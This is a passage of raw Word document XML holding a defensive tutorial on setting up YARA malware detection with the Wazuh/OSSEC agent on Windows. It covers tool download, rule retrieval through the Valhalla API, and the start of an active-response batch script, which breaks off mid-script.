          <w:szCs w:val="28"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Detecting malware using YARA integration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11168C58" w14:textId="77777777" w:rsidR="009B10B3" w:rsidRPr="009B10B3" w:rsidRDefault="009B10B3" w:rsidP="003276E6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7E16DFD7" w14:textId="77777777" w:rsidR="00E64255" w:rsidRDefault="00E64255" w:rsidP="003276E6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E64255">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">YARA is a powerful, open-source tool primarily used by security researchers and malware analysts to </w:t>
      </w:r>
      <w:r w:rsidRPr="00E64255">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>identify and classify malware</w:t>
      </w:r>
      <w:r w:rsidRPr="00E64255">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> samples based on textual or binary patterns. Often described as the "Swiss Army Knife" for pattern matching, it operates by allowing users to create </w:t>
      </w:r>
      <w:r w:rsidRPr="00E64255">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>rules</w:t>
      </w:r>
      <w:r w:rsidRPr="00E64255">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> consisting of strings, regular expressions, and logical conditions. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66D628DF" w14:textId="311141D2" w:rsidR="00E64255" w:rsidRDefault="00E64255" w:rsidP="003276E6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E64255">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>When YARA is run against a file or directory, it searches for these defined patterns; if a file matches the rule's conditions, YARA outputs the name of the rule and the matching file, enabling quick and reliable detection of threats like specific malware families or files containing known malicious code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5312DE5F" w14:textId="77777777" w:rsidR="009B10B3" w:rsidRPr="00E64255" w:rsidRDefault="009B10B3" w:rsidP="003276E6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0CF4FF86" w14:textId="1063D4E6" w:rsidR="00E64255" w:rsidRPr="00E64255" w:rsidRDefault="009B10B3" w:rsidP="003276E6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7C499A3C" wp14:editId="38E01E70">
            <wp:extent cx="6375907" cy="2526223"/>
            <wp:effectExtent l="0" t="0" r="6350" b="7620"/>
            <wp:docPr id="810649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0200" cy="2575470"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="097A6E24" w14:textId="77777777" w:rsidR="009B10B3" w:rsidRDefault="009B10B3" w:rsidP="009B10B3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5F68646F" w14:textId="44001CA0" w:rsidR="00824958" w:rsidRPr="009B10B3" w:rsidRDefault="00824958" w:rsidP="009B10B3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">1- </w:t>
      </w:r>
      <w:r w:rsidR="00192EF2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>In</w:t>
      </w:r>
      <w:r w:rsidR="009B10B3" w:rsidRPr="009B10B3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> Windows endpoints</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DD9DF0E" w14:textId="53B7F574" w:rsidR="00D107A3" w:rsidRPr="00D107A3" w:rsidRDefault="000E7E7B">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000E7E7B">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Download and install the latest </w:t>
      </w:r>
      <w:hyperlink r:id="rId34" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="000E7E7B">
          <w:rPr>
            <w:rStyle w:val="Lienhypertexte"/>
            <w:lang w:val="en-GB"/>
          </w:rPr>
          <w:t>Visual C++ Redistributable package</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="110F0AA1" w14:textId="74177C15" w:rsidR="00D107A3" w:rsidRPr="00D107A3" w:rsidRDefault="00D107A3" w:rsidP="00D107A3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D107A3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>YARA Tool Installation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EB3DBCA" w14:textId="14DCE08A" w:rsidR="000E7E7B" w:rsidRDefault="000E7E7B">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000E7E7B">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Open PowerShell with administrator privileges to download and extract YARA</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0E7E7B" w:rsidRPr="001E2C55" w14:paraId="4E1091E3" w14:textId="77777777" w:rsidTr="000E7E7B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10456" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="0A2AAEA3" w14:textId="77777777" w:rsidR="000E7E7B" w:rsidRPr="000E7E7B" w:rsidRDefault="000E7E7B" w:rsidP="000E7E7B">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="000E7E7B">
              <w:t>Invoke-WebRequest -Uri https://github.com/VirusTotal/yara/releases/download/v4.2.3/yara-4.2.3-2029-win64.zip -OutFile v4.2.3-2029-win64.zip</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1C463FF6" w14:textId="227A526C" w:rsidR="000E7E7B" w:rsidRPr="000E7E7B" w:rsidRDefault="000E7E7B" w:rsidP="000E7E7B">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="000E7E7B">
              <w:t>Expand-Archive v4.2.3-2029-win64.zip; Remove-Item v4.2.3-2029-win64.zip</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7100D4CA" w14:textId="77777777" w:rsidR="000E7E7B" w:rsidRDefault="000E7E7B" w:rsidP="000E7E7B">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A95AA0D" w14:textId="4D32CFE9" w:rsidR="00824958" w:rsidRDefault="00824958">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00824958">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Create a directory called C:\Program Files (x86)\ossec-agent\active-response\bin\yara\ and copy the YARA executable into it</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24958" w:rsidRPr="001E2C55" w14:paraId="6CA1FD32" w14:textId="77777777" w:rsidTr="00824958">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10456" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="25521A6A" w14:textId="77777777" w:rsidR="00824958" w:rsidRPr="00824958" w:rsidRDefault="00824958" w:rsidP="00824958">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="00824958">
              <w:t>mkdir 'C:\Program Files (x86)\ossec-agent\active-response\bin\yara\'</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="587DC957" w14:textId="59CC0CC7" w:rsidR="00824958" w:rsidRPr="00824958" w:rsidRDefault="00824958" w:rsidP="00824958">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="00824958">
              <w:t>cp .\v4.2.3-2029-win64\yara64.exe 'C:\Program Files (x86)\ossec-agent\active-response\bin\yara\'</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="697487FA" w14:textId="77777777" w:rsidR="00824958" w:rsidRDefault="00824958" w:rsidP="00824958">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="08DC7746" w14:textId="10EBD591" w:rsidR="00824958" w:rsidRPr="00824958" w:rsidRDefault="00824958">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00824958">
        <w:t>Install the valhallaAPI modul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24958" w14:paraId="1FB092BC" w14:textId="77777777" w:rsidTr="00824958">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10456" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="0BE9B424" w14:textId="605974B2" w:rsidR="00824958" w:rsidRDefault="00824958" w:rsidP="00824958">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="00824958">
              <w:t>pip install valhallaAPI</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6287C605" w14:textId="77777777" w:rsidR="00824958" w:rsidRDefault="00824958" w:rsidP="00824958">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7FF03FDE" w14:textId="56DB65BA" w:rsidR="00824958" w:rsidRPr="00824958" w:rsidRDefault="00824958">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00824958">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Copy the following script and save it as download_yara_rules.py</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24958" w14:paraId="37DA4C2E" w14:textId="77777777" w:rsidTr="00824958">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10456" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="1186AB98" w14:textId="77777777" w:rsidR="00824958" w:rsidRPr="00824958" w:rsidRDefault="00824958" w:rsidP="00824958">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="00824958">
              <w:t>from valhallaAPI.valhalla import ValhallaAPI</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="76719ABE" w14:textId="77777777" w:rsidR="00824958" w:rsidRPr="00824958" w:rsidRDefault="00824958" w:rsidP="00824958">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="7F4A5186" w14:textId="77777777" w:rsidR="00824958" w:rsidRPr="00824958" w:rsidRDefault="00824958" w:rsidP="00824958">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="00824958">
              <w:t>v = ValhallaAPI(api_key="1111111111111111111111111111111111111111111111111111111111111111")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="61266E19" w14:textId="77777777" w:rsidR="00824958" w:rsidRPr="00824958" w:rsidRDefault="00824958" w:rsidP="00824958">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="00824958">
              <w:t>response = v.get_rules_text()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1A5AAEFE" w14:textId="77777777" w:rsidR="00824958" w:rsidRPr="00824958" w:rsidRDefault="00824958" w:rsidP="00824958">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="23F80E0F" w14:textId="77777777" w:rsidR="00824958" w:rsidRPr="00824958" w:rsidRDefault="00824958" w:rsidP="00824958">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="00824958">
              <w:t>with open('yara_rules.yar', 'w') as fh:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4CA02C8F" w14:textId="7E40095F" w:rsidR="00824958" w:rsidRDefault="00824958" w:rsidP="00824958">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="00824958">
              <w:t xml:space="preserve">    fh.write(response)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="297B4780" w14:textId="77777777" w:rsidR="00824958" w:rsidRPr="00824958" w:rsidRDefault="00824958" w:rsidP="00824958">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="08891DC1" w14:textId="2B8AE3F0" w:rsidR="000E7E7B" w:rsidRDefault="00824958">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00824958">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Run the following commands to download the rules and place them in the C:\Program Files (x86)\ossec-agent\active-response\bin\yara\rules\ directory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B90A62E" w14:textId="77777777" w:rsidR="00824958" w:rsidRDefault="00824958" w:rsidP="00824958">
      <w:pPr>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24958" w:rsidRPr="001E2C55" w14:paraId="54DC7886" w14:textId="77777777" w:rsidTr="00824958">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10456" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="628A030E" w14:textId="77777777" w:rsidR="00824958" w:rsidRPr="00824958" w:rsidRDefault="00824958" w:rsidP="00824958">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="00824958">
              <w:t>python.exe download_yara_rules.py</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="63A414B6" w14:textId="77777777" w:rsidR="00824958" w:rsidRPr="00824958" w:rsidRDefault="00824958" w:rsidP="00824958">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="00824958">
              <w:t>mkdir 'C:\Program Files (x86)\ossec-agent\active-response\bin\yara\rules\'</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5663FC8C" w14:textId="28BB8826" w:rsidR="00824958" w:rsidRDefault="00824958" w:rsidP="00824958">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="00824958">
              <w:t>cp yara_rules.yar 'C:\Program Files (x86)\ossec-agent\active-response\bin\yara\rules\'</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3590AD8F" w14:textId="77777777" w:rsidR="00824958" w:rsidRDefault="00824958" w:rsidP="00824958">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3E0A2C09" w14:textId="77777777" w:rsidR="00824958" w:rsidRPr="00824958" w:rsidRDefault="00824958" w:rsidP="00824958">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00824958">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Configure Active Response and FIM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="398C5861" w14:textId="4A2FA2E7" w:rsidR="00E64255" w:rsidRDefault="00824958">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00824958">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Create the yara.bat script in the C:\Program Files (x86)\ossec-agent\active-response\bin\ directory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51D53340" w14:textId="77777777" w:rsidR="00824958" w:rsidRDefault="00824958" w:rsidP="00824958">
      <w:pPr>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24958" w14:paraId="20A8ED0A" w14:textId="77777777" w:rsidTr="00824958">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10456" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="0744AB38" w14:textId="77777777" w:rsidR="00824958" w:rsidRPr="00824958" w:rsidRDefault="00824958" w:rsidP="00824958">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="00824958">
              <w:t>@echo off</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="706941FB" w14:textId="77777777" w:rsidR="00824958" w:rsidRPr="00824958" w:rsidRDefault="00824958" w:rsidP="00824958">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="111534B2" w14:textId="77777777" w:rsidR="00824958" w:rsidRPr="00824958" w:rsidRDefault="00824958" w:rsidP="00824958">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="00824958">
              <w:t>setlocal enableDelayedExpansion</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7593438A" w14:textId="77777777" w:rsidR="00824958" w:rsidRPr="00824958" w:rsidRDefault="00824958" w:rsidP="00824958">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="2D92EBC9" w14:textId="77777777" w:rsidR="00824958" w:rsidRPr="00824958" w:rsidRDefault="00824958" w:rsidP="00824958">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="00824958">
              <w:t>reg Query "HKLM\Hardware\Description\System\CentralProcessor\0" | find /i "x86" &gt; NUL &amp;&amp; SET OS=32BIT || SET OS=64BIT</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="786C5229" w14:textId="77777777" w:rsidR="00824958" w:rsidRPr="00824958" w:rsidRDefault="00824958" w:rsidP="00824958">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="6E98EE6C" w14:textId="77777777" w:rsidR="00824958" w:rsidRPr="00824958" w:rsidRDefault="00824958" w:rsidP="00824958">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="7BFF8510" w14:textId="77777777" w:rsidR="00824958" w:rsidRPr="00824958" w:rsidRDefault="00824958" w:rsidP="00824958">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="00824958">
              <w:t>if %OS%==32BIT (</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="14A0C34E" w14:textId="77777777" w:rsidR="00824958" w:rsidRPr="00824958" w:rsidRDefault="00824958" w:rsidP="00824958">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="00824958">
              <w:t xml:space="preserve">    SET log_file_path="%programfiles%\ossec-agent\active-response\active-responses.log"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="767150FD" w14:textId="77777777" w:rsidR="00824958" w:rsidRPr="00824958" w:rsidRDefault="00824958" w:rsidP="00824958">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="00824958">
              <w:t>)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="743CE8F3" w14:textId="77777777" w:rsidR="00824958" w:rsidRPr="00824958" w:rsidRDefault="00824958" w:rsidP="00824958">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="5FC1B9F9" w14:textId="77777777" w:rsidR="00824958" w:rsidRPr="00824958" w:rsidRDefault="00824958" w:rsidP="00824958">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="00824958">
              <w:t>if %OS%==64BIT (</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="26085D80" w14:textId="77777777" w:rsidR="00824958" w:rsidRPr="00824958" w:rsidRDefault="00824958" w:rsidP="00824958">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="00824958">
              <w:t xml:space="preserve">    SET log_file_path="%programfiles(x86)%\ossec-agent\active-response\active-responses.log"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="29F7BB63" w14:textId="77777777" w:rsidR="00824958" w:rsidRPr="00824958" w:rsidRDefault="00824958" w:rsidP="00824958">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="00824958">
              <w:t>)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1FDC8E2C" w14:textId="77777777" w:rsidR="00824958" w:rsidRPr="00824958" w:rsidRDefault="00824958" w:rsidP="00824958">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="6B46F337" w14:textId="77777777" w:rsidR="00824958" w:rsidRPr="00824958" w:rsidRDefault="00824958" w:rsidP="00824958">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="00824958">
              <w:t>set input=</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1BED7EE4" w14:textId="77777777" w:rsidR="00824958" w:rsidRPr="00824958" w:rsidRDefault="00824958" w:rsidP="00824958">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="00824958">
              <w:t>for /f "delims=" %%a in ('PowerShell -command "$logInput = Read-Host; Write-Output $logInput"') do (</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0129B8B0" w14:textId="77777777" w:rsidR="00824958" w:rsidRPr="00824958" w:rsidRDefault="00824958" w:rsidP="00824958">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="00824958">
              <w:t xml:space="preserve">    set input=%%a</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="389EF2D5" w14:textId="77777777" w:rsidR="00824958" w:rsidRPr="00824958" w:rsidRDefault="00824958" w:rsidP="00824958">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="00824958">
              <w:t>)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="44D6A661" w14:textId="77777777" w:rsidR="00824958" w:rsidRPr="00824958" w:rsidRDefault="00824958" w:rsidP="00824958">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="79B9A3BD" w14:textId="77777777" w:rsidR="00824958" w:rsidRPr="00824958" w:rsidRDefault="00824958" w:rsidP="00824958">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="61CB74F5" w14:textId="77777777" w:rsidR="00824958" w:rsidRPr="00824958" w:rsidRDefault="00824958" w:rsidP="00824958">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="00824958">
              <w:t>set json_file_path="C:\Program Files (x86)\ossec-agent\active-response\stdin.txt"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5552B90A" w14:textId="77777777" w:rsidR="00824958" w:rsidRPr="00824958" w:rsidRDefault="00824958" w:rsidP="00824958">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="00824958">
              <w:t>set syscheck_file_path=</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="61918CE6" w14:textId="77777777" w:rsidR="00824958" w:rsidRPr="00824958" w:rsidRDefault="00824958" w:rsidP="00824958">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="00824958">
              <w:t>echo %input% &gt; %json_file_path%</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="27D72C59" w14:textId="77777777" w:rsidR="00824958" w:rsidRPr="00824958" w:rsidRDefault="00824958" w:rsidP="00824958">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="04CD0F2E" w14:textId="77777777" w:rsidR="00824958" w:rsidRPr="00824958" w:rsidRDefault="00824958" w:rsidP="00824958">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="00824958">
              <w:t>for /F "tokens=* USEBACKQ" %%F in (`Powershell -Nop -C "(Get-Content 'C:\Program Files (x86)\ossec-agent\active-response\stdin.txt'|ConvertFrom-Json).parameters.alert.syscheck.path"`) do (</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="49CBF7B4" w14:textId="77777777" w:rsidR="00824958" w:rsidRPr="00824958" w:rsidRDefault="00824958" w:rsidP="00824958">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="00824958">
              <w:t>set syscheck_file_path=%%F</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="30EAA3BC" w14:textId="77777777" w:rsidR="00824958" w:rsidRPr="00824958" w:rsidRDefault="00824958" w:rsidP="00824958">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="00824958">
              <w:t>)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="349839FD" w14:textId="77777777" w:rsidR="00824958" w:rsidRPr="00824958" w:rsidRDefault="00824958" w:rsidP="00824958">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="4EF57ED1" w14:textId="77777777" w:rsidR="00824958" w:rsidRPr="00824958" w:rsidRDefault="00824958" w:rsidP="00824958">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="00824958">
              <w:t>del /f %json_file_path%</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3B0F04F2" w14:textId="77777777" w:rsidR="00824958" w:rsidRPr="00824958" w:rsidRDefault="00824958" w:rsidP="00824958">
            <w:pPr>
